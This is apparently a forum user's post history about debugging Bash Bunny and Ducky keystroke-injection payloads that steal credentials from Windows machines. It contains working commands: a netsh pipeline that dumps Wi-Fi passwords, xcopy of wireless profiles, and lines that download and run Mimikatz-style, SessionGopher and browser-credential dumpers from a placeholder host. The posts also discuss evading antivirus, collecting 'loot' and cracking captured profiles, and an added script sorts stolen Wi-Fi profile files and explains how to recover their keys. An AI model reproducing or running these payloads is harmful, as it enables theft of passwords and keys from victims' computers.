Everything posted by TeCHemically

  1. I feel your pain, man. Many of the cred payloads simply don't work. PasswordGrabber does work, but it doesn't grab wifi creds. I am working on adding that functionality, but with great pains in so doing.
  2. Any of the escaped-out powershell commands that are broken up into separate lines with a | at the end will cause an error. I am not sure why, but they do. For the wifi cred jacking section, for instance, the last line with a | at the end causes a stop. If you add that line to the line above, then the preceding line's | is where the break happens. To resolve this anomaly I moved all the | characters to the beginning of each line. This allows the script to run through; however, the creds are not being saved to the loot folder. I am not sure why as of yet.
  3. Could you show me what method would be used to pull a payload down from a hosted server so I can modify it for my own use? I really like this payload and would like to have both methods available.
  4. Oh, I see. Well, doesn't that just reintroduce the same stability issues with hosting payloads? You are still dependent on a network connection for your payload to function. I would rather keep the data written locally and have the option to call on a payload than to have to exfil the data. There's always a chance the exe won't be caught by AV, but if it is hosted and pulled down into memory and executed, then it almost definitely won't get caught by AV. Data exfil brings in its own potential hang-ups. I already have a credential payload I'm using for Win that sends creds over the network to a server, but the php script doesn't work right, so I just capture them via tcpdump.
  5. I agree that is best, but I would still like the option. Is there a write-up on implementing a read-only partition on the bb for this yet? I am working on adding plaintext wifi cred dumping to your payload. I am having powershell syntax issues, but should have it working once that is worked out. I'll share once it is done.
  6. Looking at the WiFi cred grabber specifically, this line is throwing an error at character 383:

    \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \| \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\ ;PASSWORD\=\$pass \}\} \| Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt

Character 383 is the ";" right before "PASSWORD" on the last line toward the end. Here is the error:

    Unexpected token '\=\$name\' in expression or statement.
    At line:1 char:383
    + \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \| \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\ <<<< ;PASSWORD\=\$pass \}\} \| Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
        + CategoryInfo          : ParserError: (\=\$name\:String) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken

Can someone explain what is going wrong here? Thanks for any help you can provide!
  7. I modified the xcopy section as follows to grab information on the wireless networks on the client:

    REM if Exist %USERPROFILE%\Documents (
    if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
        REM /C Continues copying even if errors occur.
        REM /Q Does not display file names while copying.
        REM /G Allows the copying of encrypted files to destination that does not support encryption.
        REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
        REM /E Copies directories and subdirectories, including empty ones.
        xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
        REM Same as above but does not create empty directories
        REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
    )

I have confirmed this works, and many thanks to RazerBlade for a BB cred payload that actually works! Not only that, but it is insanely fast too! I think we could host the lazagne.exe file on a website we control to get around the read-only issue they were discussing on hak5. However, I like the option of being able to do it all locally if possible. What would it take to modify this so we can pull it down from a server and run it? RazerBlade, is that something you could change real fast and make available so we can have an all-local copy like we have now and a hosted version like JackRabbit? Thanks again! Also, now that I have these wireless profiles, what is the best use of them? The passphrases are hashed or something. Can these be cracked or used in another way?
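On the question of what is actually in the profile files that the xcopy above collects, here is an added example (editor's code, not the post's or the payload's). Each file under `Wlansvc\Profiles\Interfaces\<interface GUID>\` is a WLAN profile XML whose `<sharedKey>` carries the passphrase in `<keyMaterial>`. That value is never a hash: with `<protected>true</protected>` it is a DPAPI blob, recognisable by its fixed header, encrypted under the machine's DPAPI system key, and with `<protected>false</protected>` (which is what `netsh wlan export profile ... key=clear` writes) it is the plaintext passphrase. A DPAPI blob is therefore not something to crack; it is decrypted on the host by anyone who can run `netsh wlan show profile name=... key=clear`, or offline with that machine's DPAPI system master key. The script classifies the files so the loot folder can be triaged without opening each one. The three profile files are constructed, and the blob in the first one is the real DPAPI header followed by made-up filler bytes, not a decryptable blob.

```shell
#!/bin/sh
# Added example (not from the post or the payload it modifies): classify the
# WLAN profile XML files collected from
# C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<interface GUID>\.
# <keyMaterial> is a DPAPI blob when <protected>true</protected>, the plain
# passphrase when <protected>false</protected>, and absent for open networks.

# A DPAPI blob starts with version 1 followed by the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian byte order.
DPAPI_MAGIC='01000000D08C9DDF0115D1118C7A00C04FC297EB'

# xml_elem NAME FILE: text of the last <NAME>...</NAME> element in FILE.
# Enough for this fixed schema; not a general XML parser.
xml_elem() {
    tr -d '\r\n' < "$2" | sed -n "s/.*<$1>\([^<]*\)<\/$1>.*/\1/p"
}

# key_state FILE: none | plaintext | dpapi | unknown
key_state() {
    km=$(xml_elem keyMaterial "$1")
    prot=$(xml_elem protected "$1")
    if [ -z "$km" ]; then
        echo none                               # open network: no sharedKey
    elif [ "$prot" = false ]; then
        echo plaintext
    elif [ "$prot" = true ]; then
        hdr=$(printf '%s' "$km" | tr 'a-f' 'A-F' | cut -c1-40)
        if [ "$hdr" = "$DPAPI_MAGIC" ]; then echo dpapi; else echo unknown; fi
    else
        echo unknown
    fi
}

# report_profiles DIR: one tab-separated line per profile; the passphrase is
# shown only when the file itself contains it.
report_profiles() {
    for f in "$1"/*.xml; do
        state=$(key_state "$f")
        case "$state" in
            plaintext) secret=$(xml_elem keyMaterial "$f") ;;
            dpapi)     secret='<DPAPI blob: netsh ... key=clear on the host, or decrypt with its DPAPI system master key>' ;;
            *)         secret='-' ;;
        esac
        printf '%s\t%s/%s\t%s\t%s\n' "$(xml_elem name "$f")" \
            "$(xml_elem authentication "$f")" "$(xml_elem encryption "$f")" \
            "$state" "$secret"
    done
}

# Constructed sample profiles (schema as written by netsh wlan export profile).
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
write_profile() {  # write_profile FILE SSID AUTH ENC SHAREDKEY_XML
    cat > "$1" <<EOF
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>$2</name>
  <SSIDConfig><SSID><name>$2</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM><security>
    <authEncryption><authentication>$3</authentication><encryption>$4</encryption><useOneX>false</useOneX></authEncryption>
    $5
  </security></MSM>
</WLANProfile>
EOF
}
# Real DPAPI header + made-up filler: recognisable, not decryptable.
write_profile "$SAMPLE_DIR/HomeNet.xml" HomeNet WPA2PSK AES \
  '<sharedKey><keyType>passPhrase</keyType><protected>true</protected><keyMaterial>01000000d08c9ddf0115d1118c7a00c04fc297eb010000001111111122222222333333334444444455555555</keyMaterial></sharedKey>'
write_profile "$SAMPLE_DIR/Exported.xml" CoffeeShop WPA2PSK AES \
  '<sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>correct horse battery staple</keyMaterial></sharedKey>'
write_profile "$SAMPLE_DIR/Airport.xml" AirportFree open none ''

report_profiles "$SAMPLE_DIR"
```

Point `report_profiles` at the directory the xcopy line filled; anything reported as `dpapi` has to be handled on the originating host (or with its DPAPI keys), which is exactly why the `key=clear` pipeline in the other posts is the direct route to the plaintext.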
  8. Does Password Grabber get windows passwords and wireless profile passwords? I ran it, and it is running, but I'm not getting any passwords in the output file it creates. Thanks for your reply.
  9. I am having similar issues. It has been very frustrating. I identified what is broken in the jackrabbit payload, but don't understand why it is failing. All the details are here: I hope this helps someone, and if I figure this out, I will post my solution in that jackrabbit payload post.
  10. I am having similar issues with credential payloads. Details are here: I have identified what is broken, but don't know how to get it fixed.
  11. This entire section is missing from the 2nd failed window, which explains the mimikatz/dogz failure:

    # Jackin' Windows creds
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.rul/md.ps1\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
    Q DELAY 1000
    Q ENTER

These lines are also missing in the powershell window output, which explains why there are no wifi creds, ssh keys, etc., in the loot folder:

    Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
    Q ENTER
    Q DELAY 1000
    # Jackin' SSH Creds
    # change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.url/SessionGopher.ps1\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
    Q ENTER
    Q DELAY 1000

I have no clue why these lines aren't being entered into the window. They appear to be written properly, just like the lines above and below them. Thanks to any who respond!
  12. So, going through the script, the following part is not entered into the first powershell window:

    Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
    Q ENTER
    Q DELAY 1000
    # Jackin' Chrome Creds
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.url/BrowserGather.ps1\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
    Q ENTER
    Q DELAY 1000
    Q STRING exit
    Q ENTER

This is why the first window stays open and no browser creds are written to the loot folder. I have no idea why this section is failing like this, though. There doesn't seem to be any reason that this section is not injected like the rest.
  13. Here is the output of the first action/terminal window:

    PS C:\Users\profile> $Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)
    PS C:\Users\profile> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computername)-$($env:username)"
    PS C:\Users\profile> md $LOOTDIR2

        Directory: E:\loot\JackRabbit

    Mode                LastWriteTime     Length Name
    ----                -------------     ------ ----
    d----         11/1/2017  10:09 PM            TESTMACHINE-PC-profile

    PS C:\Users\profile> $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$VaultObj = new-object Windows.Security.Credentials.PasswordVault; $VaultObj.RetrieveAll() |foreach { $_.RetrievePassword(); $_ } |
    >> IEX (New-Object Net.WebClient).DownloadString('http://site.url/chrome.ps1 \)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt

I am now hosting the ps1 scripts myself, so the URLs are different from the original payload; however, this was failing from the beginning in the exact same manner. I only began hosting them myself once I started working on the script due to its failures.

Here is the output from the 2nd step/powershell terminal:

    PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> $Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)
    PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computername)-$($env:username)"
    PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> IEX (New-Object Net.WebClient).DownloadString('http://site.url/fox.ps1\)\; Get-FoxDump \| Out-File \$LOOTDIR2 \\FireFox.txt
    >> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computername)-$($env:username)"
    >> IEX (New-Object Net.WebClient).DownloadString('http://site.url/mimidogz.ps1\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" |%{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} |
    >> IEX (New-Object Net.WebClient).DownloadString('http://site.url/ssh.ps1\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt$F = @();$F += "C:\sysprep.inf";$F += "C:\sysprep\sysprep.xml";$F += "C:\WINDOWS\panther\Unattend\Unattended.xml";$F += "C:\WINDOWS\panther\Unattended.xml";$i = 0; foreach($file in $F) {if (Test-Path $file){cp $file $LOOTDIR2;$i++}}
    >> Out-File -FilePath $BUNNY\loot\DONE
    >> $Eject = New-Object -comObject Shell.Application
    >> $Eject.NameSpace(17).ParseName($Bunny).InvokeVerb("Eject")
    >> EXIT
    >>

I noticed the double ">>" that are in the terminal now. Is this a result of what is causing these actions to fail? Is there something not escaped out, or that is escaped out when it shouldn't be? Also, what is the easiest way to host these ps1 scripts on the bunny in the switch folder and call them locally instead of needing to reach out to the internet?
  14. Has anyone had any success with the jackrabbit payload? It seems to be exactly what I'm looking for, except it's not working at all. It creates the sub-folder for the target in the loot directory, but it doesn't put any data in the folder. Also, it leaves many of its powershell windows open with all of the bashbunny code just sitting there out in the open. It doesn't eject properly either. So, it's not closing its windows, writing any of the target info to the loot folder, or ejecting properly.
  15. Does anyone know what the differences are between this payload and JackRabbit? Not from a functional perspective, but what information is gathered by each payload, or are there any differences in what is grabbed?
  16. So, the DuckHunter on nethunter uses 2 different elements to inject strings: one being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string, then you need to use the TEXT element instead. I can see how this could make your scripts more efficient, but unless you know about this it just drives you crazy. Hope this helps someone!
  17. I am unable to use scripts that open CMD as admin because phantom ENTER lines are being executed after my "STRING cmd" lines in my ducky scripts. This is also happening in other places. I have a workaround to get an admin prompt, but it is of no use because these ENTER keystrokes are being entered in places where they should not be, and since they aren't actually in the script I cannot remove them. It may be that the end-of-line (EOL) character (LF in this case) is being interpreted as an ENTER keystroke. Is there any way to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the DuckHunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  18. That is perfect! Thanks :) Do you know what the per MB charge rate is?
  19. Thanks! Do you have a link to this plan where we can see what the per usage data rates are and where it can be purchased?
  20. I couldn't have said it better myself :)
  21. Thanks, that's good info to have. So, it is looking like this technique is starting to become ineffective in many places already.
  22. This was being caused because there was no SMB traffic on the target. Once I created some the quick creds module/payload worked successfully.
  23. Thanks Seb! Any idea why quick creds is blinking amber on every PC I try it on? That isn't a documented response in the readme.